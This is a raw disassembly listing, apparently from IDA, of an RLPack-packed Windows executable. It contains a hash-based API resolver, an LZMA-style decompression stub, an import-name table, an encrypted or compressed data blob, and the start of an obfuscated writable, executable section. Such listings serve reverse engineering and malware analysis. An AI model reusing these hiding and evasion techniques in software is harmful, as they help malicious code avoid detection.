mov eax, [esi+4]
rol eax, 8
cmp al, 80h
jnz short loc_42CE9D
ror eax, 8
xor eax, 80000000h
cmp eax, 10000h
jbe short loc_42CEAA
xor eax, 80000000h
push eax
push dword ptr [esi]
call sub_42CEBB
jmp short loc_42CEAA
; ---------------------------------------------------------------------------
loc_42CE9D: ; CODE XREF: sub_42CE6E+F�j
ror eax, 8
push dword ptr [esi+4]
push dword ptr [esi]
call sub_42CEBB
loc_42CEAA: ; CODE XREF: sub_42CE6E+1E�j
; sub_42CE6E+2D�j
push eax
push dword ptr [esi]
call dword ptr [ebp+0C6Dh]
mov [esp+20h+var_4], eax
popa
retn 8
sub_42CE6E endp
; =============== S U B R O U T I N E =======================================
sub_42CEBB proc near ; CODE XREF: sub_42CE6E+28�p
; sub_42CE6E+37�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebx, [esp+20h+arg_0]
mov ecx, ebx
add ebx, [ebx+3Ch]
mov ebx, [ebx+78h]
add ebx, ecx
mov edi, [ebx+20h]
add edi, ecx
xor esi, esi
loc_42CED1: ; CODE XREF: sub_42CEBB+34�j
lea edx, [edi+esi*4]
mov edx, [edx]
add edx, ecx
xor eax, eax
loc_42CEDA: ; CODE XREF: sub_42CEBB+28�j
rol eax, 7
xor al, [edx]
inc edx
cmp byte ptr [edx], 0
jnz short loc_42CEDA
cmp eax, [esp+20h+arg_4]
jz short loc_42CEF1
inc esi
cmp esi, [ebx+18h]
jb short loc_42CED1
loc_42CEF1: ; CODE XREF: sub_42CEBB+2E�j
lea edx, [edi+esi*4]
mov edx, [edx]
add edx, ecx
mov [esp+20h+var_4], edx
popa
retn 8
sub_42CEBB endp
; =============== S U B R O U T I N E =======================================
sub_42CF00 proc near ; CODE XREF: start_0-5146�p
arg_4 = dword ptr 8
pusha
lea eax, [ebp+0C5Ch]
push eax
call dword ptr [ebp+0C69h]
push 774393E8h
push eax
call sub_42CE6E
mov edi, eax
push 40h
push 1000h
push 104h
push 0
call dword ptr [ebp+0C71h]
mov [ebp+0CF8h], eax
push 104h
push dword ptr [ebp+0CF8h]
cmp dword ptr [ebp+0CE0h], 0
jz short loc_42CF51
push dword ptr [ebp+0CE0h]
jmp short loc_42CF57
; ---------------------------------------------------------------------------
loc_42CF51: ; CODE XREF: sub_42CF00+47�j
push dword ptr [ebp+0CDCh]
loc_42CF57: ; CODE XREF: sub_42CF00+4F�j
call edi
mov eax, [ebp+0CF8h]
jmp short loc_42CF62
; ---------------------------------------------------------------------------
loc_42CF61: ; CODE XREF: sub_42CF00+65�j
inc eax
loc_42CF62: ; CODE XREF: sub_42CF00+5F�j
cmp byte ptr [eax], 0
jnz short loc_42CF61
jmp short loc_42CF6D
; ---------------------------------------------------------------------------
loc_42CF69: ; CODE XREF: sub_42CF00+70�j
mov byte ptr [eax], 0
dec eax
loc_42CF6D: ; CODE XREF: sub_42CF00+67�j
cmp byte ptr [eax], 5Ch
jnz short loc_42CF69
inc eax
jmp short loc_42CF7C
; ---------------------------------------------------------------------------
loc_42CF75: ; CODE XREF: sub_42CF00+7F�j
movzx ebx, byte ptr [esi]
mov [eax], bl
inc esi
inc eax
loc_42CF7C: ; CODE XREF: sub_42CF00+73�j
cmp byte ptr [esi], 0
jnz short loc_42CF75
push dword ptr [ebp+0CF8h]
call dword ptr [ebp+0C69h]
mov [esp+14h+arg_4], eax
push 8000h
push 0
push dword ptr [ebp+0CF8h]
call dword ptr [ebp+0C75h]
popa
retn
sub_42CF00 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 30h
xor eax, eax
inc eax
mov edi, [ebp+10h]
mov [ebp-14h], eax
mov [ebp-1Ch], eax
mov [ebp-18h], eax
mov [ebp-28h], eax
mov eax, 400h
xor edx, edx
mov ecx, 30736h
rep stosd
mov eax, [ebp+0Ch]
push 5
mov [ebp-8], eax
mov [ebp-10h], edx
mov [ebp-1], dl
mov [ebp-0Ch], edx
mov [ebp+0Ch], edx
or eax, 0FFFFFFFFh
pop ecx
loc_42CFE4: ; CODE XREF: .RLPack:0042CFF9�j
mov esi, [ebp-8]
mov edx, [ebp+0Ch]
movzx esi, byte ptr [esi]
shl edx, 8
or edx, esi
inc dword ptr [ebp-8]
dec ecx
mov [ebp+0Ch], edx
jnz short loc_42CFE4
loc_42CFFB: ; CODE XREF: .RLPack:0042D18D�j
; .RLPack:0042D19C�j ...
mov esi, [ebp-10h]
mov ecx, [ebp-0Ch]
mov edx, [ebp+10h]
and esi, 3
shl ecx, 4
add ecx, esi
cmp eax, 1000000h
lea edi, [edx+ecx*4]
jnb short loc_42D02D
mov edx, [ebp-8]
mov ecx, [ebp+0Ch]
movzx edx, byte ptr [edx]
shl ecx, 8
or ecx, edx
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], ecx
loc_42D02D: ; CODE XREF: .RLPack:0042D014�j
mov ecx, [edi]
mov ebx, eax
shr ebx, 0Bh
imul ebx, ecx
cmp [ebp+0Ch], ebx
jnb loc_42D1AA
mov esi, 800h
sub esi, ecx
shr esi, 5
add esi, ecx
movzx ecx, byte ptr [ebp-1]
imul ecx, 0C00h
xor edx, edx
mov [edi], esi
mov esi, [ebp+10h]
inc edx
cmp dword ptr [ebp-0Ch], 7
lea ecx, [esi+ecx+1CD8h]
mov eax, ebx
mov [ebp-20h], ecx
jl loc_42D113
mov ecx, [ebp-10h]
sub ecx, [ebp-14h]
mov esi, [ebp+8]
movzx ecx, byte ptr [esi+ecx]
mov [ebp-24h], ecx
loc_42D084: ; CODE XREF: .RLPack:0042D10B�j
shl dword ptr [ebp-24h], 1
mov esi, [ebp-24h]
mov edi, [ebp-20h]
and esi, 100h
cmp eax, 1000000h
lea ecx, [edx+esi]
lea ecx, [edi+ecx*4+400h]
mov [ebp-2Ch], ecx
jnb short loc_42D0BE
mov ebx, [ebp-8]
mov edi, [ebp+0Ch]
movzx ebx, byte ptr [ebx]
shl edi, 8
or edi, ebx
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], edi
loc_42D0BE: ; CODE XREF: .RLPack:0042D0A5�j
mov ecx, [ecx]
mov edi, eax
shr edi, 0Bh
imul edi, ecx
cmp [ebp+0Ch], edi
jnb short loc_42D0EC
mov eax, edi
mov edi, 800h
sub edi, ecx
shr edi, 5
add edi, ecx
mov ecx, [ebp-2Ch]
add edx, edx
test esi, esi
mov [ecx], edi
jnz loc_42D16C
jmp short loc_42D105
; ---------------------------------------------------------------------------
loc_42D0EC: ; CODE XREF: .RLPack:0042D0CB�j
sub [ebp+0Ch], edi
sub eax, edi
mov edi, ecx
shr edi, 5
sub ecx, edi
test esi, esi
mov edi, [ebp-2Ch]
mov [edi], ecx
lea edx, [edx+edx+1]
jz short loc_42D16C
loc_42D105: ; CODE XREF: .RLPack:0042D0EA�j
cmp edx, 100h
jl loc_42D084
jmp short loc_42D174
; ---------------------------------------------------------------------------
loc_42D113: ; CODE XREF: .RLPack:0042D06E�j
; .RLPack:0042D172�j
cmp eax, 1000000h
mov ecx, [ebp-20h]
lea edi, [ecx+edx*4]
jnb short loc_42D137
mov esi, [ebp-8]
mov ecx, [ebp+0Ch]
movzx esi, byte ptr [esi]
shl ecx, 8
or ecx, esi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], ecx
loc_42D137: ; CODE XREF: .RLPack:0042D11E�j
mov ecx, [edi]
mov esi, eax
shr esi, 0Bh
imul esi, ecx
cmp [ebp+0Ch], esi
jnb short loc_42D15A
mov eax, esi
mov esi, 800h
sub esi, ecx
shr esi, 5
add esi, ecx
mov [edi], esi
add edx, edx
jmp short loc_42D16C
; ---------------------------------------------------------------------------
loc_42D15A: ; CODE XREF: .RLPack:0042D144�j
sub [ebp+0Ch], esi
sub eax, esi
mov esi, ecx
shr esi, 5
sub ecx, esi
mov [edi], ecx
lea edx, [edx+edx+1]
loc_42D16C: ; CODE XREF: .RLPack:0042D0E4�j
; .RLPack:0042D103�j ...
cmp edx, 100h
jl short loc_42D113
loc_42D174: ; CODE XREF: .RLPack:0042D111�j
mov esi, [ebp-10h]
mov ecx, [ebp+8]
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-0Ch], 4
mov [ebp-1], dl
mov [ecx+esi], dl
jge short loc_42D192
and dword ptr [ebp-0Ch], 0
jmp loc_42CFFB
; ---------------------------------------------------------------------------
loc_42D192: ; CODE XREF: .RLPack:0042D187�j
cmp dword ptr [ebp-0Ch], 0Ah
jge short loc_42D1A1
sub dword ptr [ebp-0Ch], 3
jmp loc_42CFFB
; ---------------------------------------------------------------------------
loc_42D1A1: ; CODE XREF: .RLPack:0042D196�j
sub dword ptr [ebp-0Ch], 6
jmp loc_42CFFB
; ---------------------------------------------------------------------------
loc_42D1AA: ; CODE XREF: .RLPack:0042D03A�j
sub [ebp+0Ch], ebx
mov edx, ecx
shr edx, 5
sub ecx, edx
mov edx, [ebp-0Ch]
sub eax, ebx
cmp eax, 1000000h
mov [edi], ecx
mov ecx, [ebp+10h]
lea edx, [ecx+edx*4+300h]
jnb short loc_42D1E3
mov edi, [ebp-8]
mov ecx, [ebp+0Ch]
movzx edi, byte ptr [edi]
shl ecx, 8
or ecx, edi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], ecx
loc_42D1E3: ; CODE XREF: .RLPack:0042D1CA�j
mov ecx, [edx]
mov edi, eax
shr edi, 0Bh
imul edi, ecx
cmp [ebp+0Ch], edi
jnb short loc_42D235
mov eax, edi
mov edi, 800h
sub edi, ecx
shr edi, 5
add edi, ecx
cmp dword ptr [ebp-0Ch], 7
mov ecx, [ebp-18h]
mov [ebp-28h], ecx
mov ecx, [ebp-1Ch]
mov [ebp-18h], ecx
mov ecx, [ebp-14h]
mov [edx], edi
mov [ebp-1Ch], ecx
jge short loc_42D220
and dword ptr [ebp-0Ch], 0
jmp short loc_42D227
; ---------------------------------------------------------------------------
loc_42D220: ; CODE XREF: .RLPack:0042D218�j
mov dword ptr [ebp-0Ch], 3
loc_42D227: ; CODE XREF: .RLPack:0042D21E�j
mov ecx, [ebp+10h]
add ecx, 0CC8h
jmp loc_42D41E
; ---------------------------------------------------------------------------
loc_42D235: ; CODE XREF: .RLPack:0042D1F0�j
sub [ebp+0Ch], edi
sub eax, edi
mov edi, ecx
shr edi, 5
sub ecx, edi
cmp eax, 1000000h
mov [edx], ecx
mov ecx, [ebp-0Ch]
mov edx, [ebp+10h]
lea edi, [edx+ecx*4+330h]
jnb short loc_42D26E
mov edx, [ebp-8]
mov ecx, [ebp+0Ch]
movzx edx, byte ptr [edx]
shl ecx, 8
or ecx, edx
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], ecx
loc_42D26E: ; CODE XREF: .RLPack:0042D255�j
mov ecx, [edi]
mov edx, eax
shr edx, 0Bh
imul edx, ecx
cmp [ebp+0Ch], edx
jnb loc_42D322
mov ebx, 800h
sub ebx, ecx
shr ebx, 5
add ebx, ecx
mov ecx, [ebp-0Ch]
add ecx, 0Fh
shl ecx, 4
mov [edi], ebx
mov edi, [ebp+10h]
add ecx, esi
cmp edx, 1000000h
mov eax, edx
lea edi, [edi+ecx*4]
jnb short loc_42D2C3
mov ecx, [ebp+0Ch]
shl edx, 8
mov eax, edx
mov edx, [ebp-8]
movzx edx, byte ptr [edx]
shl ecx, 8
or ecx, edx
inc dword ptr [ebp-8]
mov [ebp+0Ch], ecx
loc_42D2C3: ; CODE XREF: .RLPack:0042D2A8�j
mov ecx, [edi]
mov edx, eax
shr edx, 0Bh
imul edx, ecx
cmp [ebp+0Ch], edx
jnb short loc_42D30F
mov esi, [ebp-10h]
mov eax, edx
mov edx, 800h
sub edx, ecx
shr edx, 5
add edx, ecx
xor ecx, ecx
cmp dword ptr [ebp-0Ch], 7
mov [edi], edx
mov edx, [ebp+8]
setnl cl
lea ecx, [ecx+ecx+9]
mov [ebp-0Ch], ecx
mov ecx, [ebp-10h]
sub ecx, [ebp-14h]
inc dword ptr [ebp-10h]
mov cl, [edx+ecx]
mov [ebp-1], cl
mov [edx+esi], cl
jmp loc_42CFFB
; ---------------------------------------------------------------------------
loc_42D30F: ; CODE XREF: .RLPack:0042D2D0�j
sub [ebp+0Ch], edx
sub eax, edx
mov edx, ecx
shr edx, 5
sub ecx, edx
mov [edi], ecx
jmp loc_42D402
; ---------------------------------------------------------------------------
loc_42D322: ; CODE XREF: .RLPack:0042D27B�j
sub [ebp+0Ch], edx
sub eax, edx
mov edx, ecx
shr edx, 5
sub ecx, edx
cmp eax, 1000000h
mov edx, [ebp+10h]
mov [edi], ecx
mov ecx, [ebp-0Ch]
lea edx, [edx+ecx*4+360h]
jnb short loc_42D35B
mov edi, [ebp-8]
mov ecx, [ebp+0Ch]
movzx edi, byte ptr [edi]
shl ecx, 8
or ecx, edi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], ecx
loc_42D35B: ; CODE XREF: .RLPack:0042D342�j
mov ecx, [edx]
mov edi, eax
shr edi, 0Bh
imul edi, ecx
cmp [ebp+0Ch], edi
jnb short loc_42D37F
mov eax, edi
mov edi, 800h
sub edi, ecx
shr edi, 5
add edi, ecx
mov ecx, [ebp-1Ch]
mov [edx], edi
jmp short loc_42D3F9
; ---------------------------------------------------------------------------
loc_42D37F: ; CODE XREF: .RLPack:0042D368�j
sub [ebp+0Ch], edi
sub eax, edi
mov edi, ecx
shr edi, 5
sub ecx, edi
cmp eax, 1000000h
mov [edx], ecx
mov ecx, [ebp-0Ch]
mov edx, [ebp+10h]
lea edx, [edx+ecx*4+390h]
jnb short loc_42D3B8
mov edi, [ebp-8]
mov ecx, [ebp+0Ch]
movzx edi, byte ptr [edi]
shl ecx, 8
or ecx, edi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], ecx
loc_42D3B8: ; CODE XREF: .RLPack:0042D39F�j
mov ecx, [edx]
mov edi, eax
shr edi, 0Bh
imul edi, ecx
cmp [ebp+0Ch], edi
jnb short loc_42D3DC
mov eax, edi
mov edi, 800h
sub edi, ecx
shr edi, 5
add edi, ecx
mov ecx, [ebp-18h]
mov [edx], edi
jmp short loc_42D3F3
; ---------------------------------------------------------------------------
loc_42D3DC: ; CODE XREF: .RLPack:0042D3C5�j
sub [ebp+0Ch], edi
sub eax, edi
mov edi, ecx
shr edi, 5
sub ecx, edi
mov [edx], ecx
mov edx, [ebp-18h]
mov ecx, [ebp-28h]
mov [ebp-28h], edx
loc_42D3F3: ; CODE XREF: .RLPack:0042D3DA�j
mov edx, [ebp-1Ch]
mov [ebp-18h], edx
loc_42D3F9: ; CODE XREF: .RLPack:0042D37D�j
mov edx, [ebp-14h]
mov [ebp-1Ch], edx
mov [ebp-14h], ecx
loc_42D402: ; CODE XREF: .RLPack:0042D31D�j
xor ecx, ecx
cmp dword ptr [ebp-0Ch], 7
setnl cl
dec ecx
and ecx, 0FFFFFFFDh
add ecx, 0Bh
mov [ebp-0Ch], ecx
mov ecx, [ebp+10h]
add ecx, 14D0h
loc_42D41E: ; CODE XREF: .RLPack:0042D230�j
cmp eax, 1000000h
jnb short loc_42D43C
mov edi, [ebp-8]
mov edx, [ebp+0Ch]
movzx edi, byte ptr [edi]
shl edx, 8
or edx, edi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], edx
loc_42D43C: ; CODE XREF: .RLPack:0042D423�j
mov edx, [ecx]
mov edi, eax
shr edi, 0Bh
imul edi, edx
cmp [ebp+0Ch], edi
jnb short loc_42D468
mov eax, edi
mov edi, 800h
sub edi, edx
shr edi, 5
add edi, edx
shl esi, 5
and dword ptr [ebp-24h], 0
mov [ecx], edi
lea ecx, [ecx+esi+8]
jmp short loc_42D4C6
; ---------------------------------------------------------------------------
loc_42D468: ; CODE XREF: .RLPack:0042D449�j
sub [ebp+0Ch], edi
sub eax, edi
mov edi, edx
shr edi, 5
sub edx, edi
cmp eax, 1000000h
mov [ecx], edx
jnb short loc_42D494
mov edi, [ebp-8]
mov edx, [ebp+0Ch]
movzx edi, byte ptr [edi]
shl edx, 8
or edx, edi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], edx
loc_42D494: ; CODE XREF: .RLPack:0042D47B�j
mov edx, [ecx+4]
mov edi, eax
shr edi, 0Bh
imul edi, edx
cmp [ebp+0Ch], edi
jnb short loc_42D4CF
mov eax, edi
mov edi, 800h
sub edi, edx
shr edi, 5
add edi, edx
shl esi, 5
mov [ecx+4], edi
lea ecx, [ecx+esi+208h]
mov dword ptr [ebp-24h], 8
loc_42D4C6: ; CODE XREF: .RLPack:0042D466�j
mov dword ptr [ebp-20h], 3
jmp short loc_42D4F2
; ---------------------------------------------------------------------------
loc_42D4CF: ; CODE XREF: .RLPack:0042D4A2�j
sub [ebp+0Ch], edi
mov esi, edx
shr esi, 5
sub edx, esi
sub eax, edi
mov [ecx+4], edx
add ecx, 408h
mov dword ptr [ebp-24h], 10h
mov dword ptr [ebp-20h], 8
loc_42D4F2: ; CODE XREF: .RLPack:0042D4CD�j
mov edx, [ebp-20h]
xor ebx, ebx
mov [ebp-2Ch], edx
inc ebx
loc_42D4FB: ; CODE XREF: .RLPack:0042D554�j
cmp eax, 1000000h
jnb short loc_42D519
mov esi, [ebp-8]
mov edx, [ebp+0Ch]
movzx esi, byte ptr [esi]
shl edx, 8
or edx, esi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], edx
loc_42D519: ; CODE XREF: .RLPack:0042D500�j
mov edx, [ecx+ebx*4]
mov esi, eax
shr esi, 0Bh
imul esi, edx
cmp [ebp+0Ch], esi
jnb short loc_42D53E
mov eax, esi
mov esi, 800h
sub esi, edx
shr esi, 5
add esi, edx
mov [ecx+ebx*4], esi
add ebx, ebx
jmp short loc_42D551
; ---------------------------------------------------------------------------
loc_42D53E: ; CODE XREF: .RLPack:0042D527�j
sub [ebp+0Ch], esi
sub eax, esi
mov esi, edx
shr esi, 5
sub edx, esi
mov [ecx+ebx*4], edx
lea ebx, [ebx+ebx+1]
loc_42D551: ; CODE XREF: .RLPack:0042D53C�j
dec dword ptr [ebp-2Ch]
jnz short loc_42D4FB
mov ecx, [ebp-20h]
xor edx, edx
inc edx
mov esi, edx
shl esi, cl
mov ecx, [ebp-24h]
sub ecx, esi
add ebx, ecx
cmp dword ptr [ebp-0Ch], 4
mov [ebp-30h], ebx
jge loc_42D708
add dword ptr [ebp-0Ch], 7
cmp ebx, 4
jge short loc_42D581
mov ecx, ebx
jmp short loc_42D584
; ---------------------------------------------------------------------------
loc_42D581: ; CODE XREF: .RLPack:0042D57B�j
push 3
pop ecx
loc_42D584: ; CODE XREF: .RLPack:0042D57F�j
mov esi, [ebp+10h]
shl ecx, 8
lea edi, [esi+ecx+6C0h]
mov dword ptr [ebp-2Ch], 6
loc_42D598: ; CODE XREF: .RLPack:0042D5F1�j
cmp eax, 1000000h
jnb short loc_42D5B6
mov esi, [ebp-8]
mov ecx, [ebp+0Ch]
movzx esi, byte ptr [esi]
shl ecx, 8
or ecx, esi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], ecx
loc_42D5B6: ; CODE XREF: .RLPack:0042D59D�j
mov ecx, [edi+edx*4]
mov esi, eax
shr esi, 0Bh
imul esi, ecx
cmp [ebp+0Ch], esi
jnb short loc_42D5DB
mov eax, esi
mov esi, 800h
sub esi, ecx
shr esi, 5
add esi, ecx
mov [edi+edx*4], esi
add edx, edx
jmp short loc_42D5EE
; ---------------------------------------------------------------------------
loc_42D5DB: ; CODE XREF: .RLPack:0042D5C4�j
sub [ebp+0Ch], esi
sub eax, esi
mov esi, ecx
shr esi, 5
sub ecx, esi
mov [edi+edx*4], ecx
lea edx, [edx+edx+1]
loc_42D5EE: ; CODE XREF: .RLPack:0042D5D9�j
dec dword ptr [ebp-2Ch]
jnz short loc_42D598
sub edx, 40h
cmp edx, 4
mov edi, edx
jl loc_42D6D9
mov ecx, edx
sar ecx, 1
and edi, 1
dec ecx
or edi, 2
cmp edx, 0Eh
mov [ebp-14h], ecx
jge short loc_42D626
shl edi, cl
mov ecx, edi
sub ecx, edx
mov edx, [ebp+10h]
lea ebx, [edx+ecx*4+0ABCh]
jmp short loc_42D66C
; ---------------------------------------------------------------------------
loc_42D626: ; CODE XREF: .RLPack:0042D612�j
sub ecx, 4
loc_42D629: ; CODE XREF: .RLPack:0042D657�j
cmp eax, 1000000h
jnb short loc_42D647
mov esi, [ebp-8]
mov edx, [ebp+0Ch]
movzx esi, byte ptr [esi]
shl edx, 8
or edx, esi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], edx
loc_42D647: ; CODE XREF: .RLPack:0042D62E�j
shr eax, 1
add edi, edi
cmp [ebp+0Ch], eax
jb short loc_42D656
sub [ebp+0Ch], eax
or edi, 1
loc_42D656: ; CODE XREF: .RLPack:0042D64E�j
dec ecx
jnz short loc_42D629
mov ebx, [ebp+10h]
add ebx, 0C88h
shl edi, 4
mov dword ptr [ebp-14h], 4
loc_42D66C: ; CODE XREF: .RLPack:0042D624�j
xor ecx, ecx
inc ecx
mov [ebp-20h], ebx
mov [ebp-24h], ecx
loc_42D675: ; CODE XREF: .RLPack:0042D6D7�j
cmp eax, 1000000h
jnb short loc_42D693
mov esi, [ebp-8]
mov edx, [ebp+0Ch]
movzx esi, byte ptr [esi]
shl edx, 8
or edx, esi
shl eax, 8
inc dword ptr [ebp-8]
mov [ebp+0Ch], edx
loc_42D693: ; CODE XREF: .RLPack:0042D67A�j
mov edx, [ebx+ecx*4]
mov esi, eax
shr esi, 0Bh
imul esi, edx
cmp [ebp+0Ch], esi
jnb short loc_42D6B8
mov eax, esi
mov esi, 800h
sub esi, edx
shr esi, 5
add esi, edx
mov [ebx+ecx*4], esi
add ecx, ecx
jmp short loc_42D6D1
; ---------------------------------------------------------------------------
loc_42D6B8: ; CODE XREF: .RLPack:0042D6A1�j
sub [ebp+0Ch], esi
mov ebx, [ebp-20h]
sub eax, esi
mov esi, edx
shr esi, 5
sub edx, esi
or edi, [ebp-24h]
mov [ebx+ecx*4], edx
lea ecx, [ecx+ecx+1]
loc_42D6D1: ; CODE XREF: .RLPack:0042D6B6�j
shl dword ptr [ebp-24h], 1
dec dword ptr [ebp-14h]
jnz short loc_42D675
loc_42D6D9: ; CODE XREF: .RLPack:0042D5FB�j
inc edi
mov [ebp-14h], edi
jz short loc_42D70D
mov ebx, [ebp-30h]
loc_42D6E2: ; CODE XREF: .RLPack:0042D70B�j
mov ecx, [ebp-10h]
inc ebx
sub ecx, edi
inc ebx
add ecx, [ebp+8]
loc_42D6EC: ; CODE XREF: .RLPack:0042D701�j
mov dl, [ecx]
mov esi, [ebp-10h]
mov edi, [ebp+8]
dec ebx
inc dword ptr [ebp-10h]
inc ecx
test ebx, ebx
mov [ebp-1], dl
mov [edi+esi], dl
jnz short loc_42D6EC
jmp loc_42CFFB
; ---------------------------------------------------------------------------
loc_42D708: ; CODE XREF: .RLPack:0042D56E�j
mov edi, [ebp-14h]
jmp short loc_42D6E2
; ---------------------------------------------------------------------------
loc_42D70D: ; CODE XREF: .RLPack:0042D6DD�j
mov eax, [ebp-10h]
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 10h
dd 2D73Ch, 2D749h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 801D7700h, 80ADA07Ch
dd 809A517Ch, 809AE47Ch, 801AD07Ch, 7Ch, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 74654700h, 636F7250h, 72646441h
dd 737365h, 72695600h, 6C617574h, 6F6C6C41h, 56000063h
dd 75747269h, 72466C61h, 6565h, 74726956h, 506C6175h, 65746F72h
dd 7463h, 1000h, 8, 40h, 320000h, 2 dup(400000h), 2 dup(0)
dd 1000h, 16000h, 1, 0
dd 77120000h, 3F02E5h, 3F0000h, 22000h, 1000h, 2A687h
dd 18000h, 2CA89h, 20000h, 0
dd 0C6942600h, 0E5A532C4h, 485756B9h, 82F4CC63h, 0F7231783h
dd 677ACEFFh, 26BEDD7Fh, 7CB97090h, 5FCA812Eh, 0FF74BDC0h
dd 6C8CD892h, 36786349h, 0ED4689E2h, 615583EDh, 9316186Dh
dd 31289140h, 3895B39Dh, 0B10F8ACAh, 404A9056h, 675B9E16h
dd 0E1A77765h, 0D92E7074h, 5C9B62CBh, 30238B70h, 976017D0h
dd 805C1910h, 0D2BAB97Bh, 0DFD91C28h, 0B2ABD927h, 226857CDh
dd 4FABDBFFh, 0D3FFEC85h, 2AF9914Eh, 13EEEC96h, 1483E334h
dd 2F638080h, 78079B11h, 3845B3F9h, 0CDE2BDF3h, 0A2EA332Bh
dd 1EDDF822h, 17C1600Fh, 0B8B1321Dh, 29C7ECFDh, 6AAC1313h
dd 8C660C72h, 70A57C59h, 0DBAFB065h, 9E85A564h, 2DCB8E1Eh
dd 99B2733Eh, 0EEF1B4FEh, 0FA74A431h, 8ABA742Bh, 1C78CF30h
dd 17F7F2F8h, 0CE250F54h, 0A29E0E8h, 9140CE9h, 9F53941Fh
dd 0B5B6B5D5h, 0D4A674F5h, 41501A8Bh, 0CB772B62h, 0CE04337Bh
dd 404F4734h, 3E99825Ah, 428E2241h, 0C3880FCCh, 50909BDCh
dd 8CAED6BEh, 74E3C323h, 30C53D6Dh, 0DABC0BF3h, 3C205594h
dd 0F6A13C22h, 15FBC69h, 29067B78h, 4FABD60Dh, 8D777199h
dd 0EDEB78F4h, 5D252B6Bh, 457A0B76h, 163BAEA5h, 5366625Ch
dd 0E81E84C3h, 13372B16h, 0A1B9FBE5h, 85947121h, 23686630h
dd 9B2365D6h, 0E7CA170Eh, 0D9838D47h, 8B1A03A9h, 0CFEB1678h
dd 0F2E47FD3h, 0DBBD71FDh, 8C8BED35h, 490EFD0Eh, 9EC55017h
dd 0A74B9F29h, 0AC1683B3h, 37B5DA09h, 61400372h, 9BB9CEFDh
dd 9586A919h, 29D1167Ah, 0C0FCBFA4h, 7BFE788h, 0A9CBAFE3h
dd 41DCC48Ah, 0A59C880Dh, 9C255C9Eh, 0BDD2D4D5h, 0E9E48F6Dh
dd 4E34FC30h, 0B2A90584h, 3E945A0Ch, 0DB338A3Bh, 1CA2CE77h
dd 83C4B767h, 0B0DEE82Ch, 34E90B83h, 0F6A35869h, 0C1192D3Bh
dd 9C2E20D2h, 23B8DE7Ch, 54E30793h, 7D3933A5h, 200FE185h
dd 8218E8E5h, 0C740969Bh, 4F87A8DFh, 56EFE885h, 4B11BDD1h
dd 3F61AEEEh, 607E624Ah, 0BDC07D73h, 0EA5CB9h, 0A81E2992h
dd 0BF6EF47Eh, 2974D571h, 0AA94AE8Ah, 0F91C549Fh, 0FF6669DAh
dd 49AB3A2Fh, 0F33DF930h, 0CBCF392h, 0BEB4C8A0h, 85D8537Eh
dd 60952EDDh, 18B0462Fh, 3511403h, 0F4B63C2Dh, 0BCABEF15h
dd 0F14FEE22h, 3C5E9000h, 0BDAB69FBh, 0FB2A90B1h, 0FEADBD93h
dd 0F1FF27DDh, 3823B2h, 0C7000000h, 6D822667h, 0E16267D7h
dd 0A90E40EFh, 0E924877Eh, 0C6B59DD0h, 906CBF43h, 321B2691h
dd 0C77EC01Bh, 7BBBB4A8h, 0EE14D1B9h, 90532A1Dh, 50D82FCCh
dd 0A9B5977Ah, 0FA25BF8Fh, 0E0103E24h, 658AB054h, 2E376660h
dd 84E5D528h, 5B8CA84Fh, 6F8D1E21h, 0AAFBCBCBh, 0CF743B7Bh
dd 0FFC43F71h, 0E701FF0Ah, 0A3AF707Ch, 0EE77067Fh, 0B16CA50Bh
dd 83ED2210h, 6E3D2005h, 0ABB43DFEh, 0B60C876Bh, 4B90D42Fh
dd 5A1CB213h, 7AD551BFh, 0FDCA1F2Dh, 9D962227h, 1FBC811h
dd 0FEF04Fh, 7898DB15h, 24E162A4h, 8C2CD291h, 7A0A2A3Dh
dd 80D8328Dh, 6C095B56h, 15871472h, 25C009F7h, 0DAC95173h
dd 8D27EEC3h, 40912BE3h, 73FCDA30h, 0F4F0940Ch, 418CFD92h
dd 86FD8A68h, 51E0506Ah, 0CD7984ADh, 0FCAFE571h, 0EFD89AF3h
dd 7328BBBBh, 855CB05Ah, 2825EE3h, 371E79E8h, 0D8F2ACh
dd 0B3BA9FA0h, 531A04F4h, 82F578BDh, 59D0AE8Dh, 0CBEA02D2h
dd 6ADCBAA6h, 75604CCBh, 0D4481A0Dh, 0BEAFF01Ah, 0F990B28Fh
dd 3453B969h, 854A925Dh, 0EC8B8D60h, 40F4CD51h, 0DD7E00F9h
dd 7B567D33h, 32600061h, 0D3BCFC6h, 0F56AB66Ch, 0B9FD802Bh
dd 45B4ADD9h, 2179DE8Eh, 68B0DA6h, 0E92D4B6h, 7137D067h
dd 6DA2D51Bh, 8865AB68h, 0F465C87Fh, 80B4A29Ch, 376B27C4h
dd 100h dup(0)
_RLPack ends
; ---------------------------------------------------------------------------
; Section 3. (virtual address 0002E000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 0002E000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
j8_b78ws segment para public 'CODE' use32
assume cs:j8_b78ws
;org 42E000h
assume es:nothing, ss:nothing, ds:_packed, fs:nothing, gs:nothing
cdq
xchg ebx, ebp
jmp sub_431E69
; ---------------------------------------------------------------------------
loc_42E008: ; CODE XREF: j8.b78ws:00431555�j
or esi, 0CA87CED7h
; =============== S U B R O U T I N E =======================================
sub_42E00E proc near ; CODE XREF: sub_430905+6�p
xchg edi, [esp+0]
pop edi
pop ebp
retn
sub_42E00E endp ; sp-analysis failed
